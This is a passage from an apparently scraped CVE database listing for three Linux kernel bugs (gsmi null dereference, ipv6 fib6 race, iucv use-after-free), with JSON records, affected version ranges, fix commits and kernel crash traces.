"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:14.166Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/google/gsmi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ee5763ef829bd923033510de6d1df7c73f085e4b",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "32313c11bdc8a02c577abaf865be3664ab30410a",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "ffef77794fb5f1245c3249b86342bad2299accb5",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "ae2a9dcc8caa60b1e14671294e5ec902ea5d1dfd",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "eb0421d90f916dffe96b4c049ddf01c0c50620d2",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "6646d769fdb0ce4318ef9afd127f8526d1ca8393",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
},
{
"lessThan": "a769b05eeed7accc4019a1ed9799dd72067f1ce8",
"status": "affected",
"version": "74c5b31c6618f01079212332b2e5f6c42f2d6307",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/google/gsmi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.304",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngsmi: fix null-deref in gsmi_get_variable\n\nWe can get EFI variables without fetching the attribute, so we must\nallow for that in gsmi.\n\ncommit 859748255b43 (\"efi: pstore: Omit efivars caching EFI varstore\naccess layer\") added a new get_variable call with attr=NULL, which\ntriggers panic in gsmi."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:26.097Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ee5763ef829bd923033510de6d1df7c73f085e4b"
},
{
"url": "https://git.kernel.org/stable/c/32313c11bdc8a02c577abaf865be3664ab30410a"
},
{
"url": "https://git.kernel.org/stable/c/ffef77794fb5f1245c3249b86342bad2299accb5"
},
{
"url": "https://git.kernel.org/stable/c/ae2a9dcc8caa60b1e14671294e5ec902ea5d1dfd"
},
{
"url": "https://git.kernel.org/stable/c/eb0421d90f916dffe96b4c049ddf01c0c50620d2"
},
{
"url": "https://git.kernel.org/stable/c/6646d769fdb0ce4318ef9afd127f8526d1ca8393"
},
{
"url": "https://git.kernel.org/stable/c/a769b05eeed7accc4019a1ed9799dd72067f1ce8"
}
],
"title": "gsmi: fix null-deref in gsmi_get_variable",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52893",
"datePublished": "2024-08-21T06:10:33.043Z",
"dateReserved": "2024-08-21T06:07:11.013Z",
"dateUpdated": "2025-05-04T07:45:26.097Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-40905 (GCVE-0-2024-40905)
Vulnerability from cvelistv5
Published
2024-07-12 12:20
Modified
2025-05-04 09:17
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix possible race in __fib6_drop_pcpu_from()
syzbot found a race in __fib6_drop_pcpu_from() [1]
If compiler reads more than once (*ppcpu_rt),
second read could read NULL, if another cpu clears
the value in rt6_get_pcpu_route().
Add a READ_ONCE() to prevent this race.
Also add rcu_read_lock()/rcu_read_unlock() because
we rely on RCU protection while dereferencing pcpu_rt.
[1]
Oops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097]
CPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024
Workqueue: netns cleanup_net
RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984
Code: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 <80> 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48
RSP: 0018:ffffc900040df070 EFLAGS: 00010206
RAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16
RDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091
RBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007
R10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8
R13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001
FS: 0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
__fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline]
fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline]
fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038
fib6_del_route net/ipv6/ip6_fib.c:1998 [inline]
fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043
fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205
fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127
fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175
fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255
__fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271
rt6_sync_down_dev net/ipv6/route.c:4906 [inline]
rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911
addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855
addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778
notifier_call_chain+0xb9/0x410 kernel/notifier.c:93
call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992
call_netdevice_notifiers_extack net/core/dev.c:2030 [inline]
call_netdevice_notifiers net/core/dev.c:2044 [inline]
dev_close_many+0x333/0x6a0 net/core/dev.c:1585
unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193
unregister_netdevice_many net/core/dev.c:11276 [inline]
default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759
ops_exit_list+0x128/0x180 net/core/net_namespace.c:178
cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640
process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231
process_scheduled_works kernel/workqueue.c:3312 [inline]
worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393
kthread+0x2c1/0x3a0 kernel/kthread.c:389
ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 Version: d52d3997f843ffefaa8d8462790ffcaca6c74192 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.398Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c90af1cced2f669a7b2304584be4ada495eaa0e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c693698787660c97950bc1f93a8dd19d8307153d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0bc020592b54a8f3fa2b7f244b6e39e526c2e12"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2498960dac9b6fc49b6d1574f7cd1a4872744adf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e796c3fefa8b17b30e7252886ae8cffacd2b9ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09e5a5a80e205922151136069e440477d6816914"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b01e1c030770ff3b4fe37fc7cc6bca03f594133f"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:06:21.867829Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:38.202Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_fib.c",
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c90af1cced2f669a7b2304584be4ada495eaa0e5",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "c693698787660c97950bc1f93a8dd19d8307153d",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "a0bc020592b54a8f3fa2b7f244b6e39e526c2e12",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "2498960dac9b6fc49b6d1574f7cd1a4872744adf",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "7e796c3fefa8b17b30e7252886ae8cffacd2b9ef",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "09e5a5a80e205922151136069e440477d6816914",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
},
{
"lessThan": "b01e1c030770ff3b4fe37fc7cc6bca03f594133f",
"status": "affected",
"version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_fib.c",
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.95",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.35",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.95",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.35",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.6",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix possible race in __fib6_drop_pcpu_from()\n\nsyzbot found a race in __fib6_drop_pcpu_from() [1]\n\nIf compiler reads more than once (*ppcpu_rt),\nsecond read could read NULL, if another cpu clears\nthe value in rt6_get_pcpu_route().\n\nAdd a READ_ONCE() to prevent this race.\n\nAlso add rcu_read_lock()/rcu_read_unlock() because\nwe rely on RCU protection while dereferencing pcpu_rt.\n\n[1]\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097]\nCPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nWorkqueue: netns cleanup_net\n RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984\nCode: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 \u003c80\u003e 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48\nRSP: 0018:ffffc900040df070 EFLAGS: 00010206\nRAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16\nRDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091\nRBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007\nR10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8\nR13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001\nFS: 0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n __fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline]\n fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline]\n fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038\n fib6_del_route net/ipv6/ip6_fib.c:1998 [inline]\n fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043\n fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205\n fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127\n fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175\n fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255\n __fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271\n rt6_sync_down_dev net/ipv6/route.c:4906 [inline]\n rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911\n addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855\n addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778\n notifier_call_chain+0xb9/0x410 kernel/notifier.c:93\n call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992\n call_netdevice_notifiers_extack net/core/dev.c:2030 [inline]\n call_netdevice_notifiers net/core/dev.c:2044 [inline]\n dev_close_many+0x333/0x6a0 net/core/dev.c:1585\n unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193\n unregister_netdevice_many net/core/dev.c:11276 [inline]\n default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759\n ops_exit_list+0x128/0x180 net/core/net_namespace.c:178\n cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640\n process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231\n process_scheduled_works kernel/workqueue.c:3312 [inline]\n worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393\n kthread+0x2c1/0x3a0 kernel/kthread.c:389\n ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:17:30.856Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c90af1cced2f669a7b2304584be4ada495eaa0e5"
},
{
"url": "https://git.kernel.org/stable/c/c693698787660c97950bc1f93a8dd19d8307153d"
},
{
"url": "https://git.kernel.org/stable/c/a0bc020592b54a8f3fa2b7f244b6e39e526c2e12"
},
{
"url": "https://git.kernel.org/stable/c/2498960dac9b6fc49b6d1574f7cd1a4872744adf"
},
{
"url": "https://git.kernel.org/stable/c/7e796c3fefa8b17b30e7252886ae8cffacd2b9ef"
},
{
"url": "https://git.kernel.org/stable/c/09e5a5a80e205922151136069e440477d6816914"
},
{
"url": "https://git.kernel.org/stable/c/b01e1c030770ff3b4fe37fc7cc6bca03f594133f"
}
],
"title": "ipv6: fix possible race in __fib6_drop_pcpu_from()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-40905",
"datePublished": "2024-07-12T12:20:45.832Z",
"dateReserved": "2024-07-12T12:17:45.580Z",
"dateUpdated": "2025-05-04T09:17:30.856Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42271 (GCVE-0-2024-42271)
Vulnerability from cvelistv5
Published
2024-08-17 08:54
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/iucv: fix use after free in iucv_sock_close()
iucv_sever_path() is called from process context and from bh context.
iucv->path is used as indicator whether somebody else is taking care of
severing the path (or it is already removed / never existed).
This needs to be done with atomic compare and swap, otherwise there is a
small window where iucv_sock_close() will try to work with a path that has
already been severed and freed by iucv_callback_connrej() called by
iucv_tasklet_fn().
Example:
[452744.123844] Call Trace:
[452744.123845] ([<0000001e87f03880>] 0x1e87f03880)
[452744.123966] [<00000000d593001e>] iucv_path_sever+0x96/0x138
[452744.124330] [<000003ff801ddbca>] iucv_sever_path+0xc2/0xd0 [af_iucv]
[452744.124336] [<000003ff801e01b6>] iucv_sock_close+0xa6/0x310 [af_iucv]
[452744.124341] [<000003ff801e08cc>] iucv_sock_release+0x3c/0xd0 [af_iucv]
[452744.124345] [<00000000d574794e>] __sock_release+0x5e/0xe8
[452744.124815] [<00000000d5747a0c>] sock_close+0x34/0x48
[452744.124820] [<00000000d5421642>] __fput+0xba/0x268
[452744.124826] [<00000000d51b382c>] task_work_run+0xbc/0xf0
[452744.124832] [<00000000d5145710>] do_notify_resume+0x88/0x90
[452744.124841] [<00000000d5978096>] system_call+0xe2/0x2c8
[452744.125319] Last Breaking-Event-Address:
[452744.125321] [<00000000d5930018>] iucv_path_sever+0x90/0x138
[452744.125324]
[452744.125325] Kernel panic - not syncing: Fatal exception in interrupt
Note that bh_lock_sock() is not serializing the tasklet context against
process context, because the check for sock_owned_by_user() and
corresponding handling is missing.
Ideas for a future clean-up patch:
A) Correct usage of bh_lock_sock() in tasklet context, as described in
Re-enqueue, if needed. This may require adding return values to the
tasklet functions and thus changes to all users of iucv.
B) Change iucv tasklet into worker and use only lock_sock() in af_iucv.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e Version: 7d316b9453523498246e9e19a659c423d4c5081e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42271",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:12:11.442193Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:32.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/iucv/af_iucv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84f40b46787ecb67c7ad08a5bb1376141fa10c01",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "37652fbef9809411cea55ea5fa1a170e299efcd0",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "c65f72eec60a34ace031426e04e9aff8e5f04895",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "ac758e1f663fe9bc64f6b47212a2aa18697524f5",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "8b424c9e44111c5a76f41c6b741f8d4c4179d876",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "01437282fd3904810603f3dc98d2cac6b8b6fc84",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "69620522c48ce8215e5eb55ffbab8cafee8f407d",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
},
{
"lessThan": "f558120cd709682b739207b48cf7479fd9568431",
"status": "affected",
"version": "7d316b9453523498246e9e19a659c423d4c5081e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/iucv/af_iucv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.4"
},
{
"lessThan": "3.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
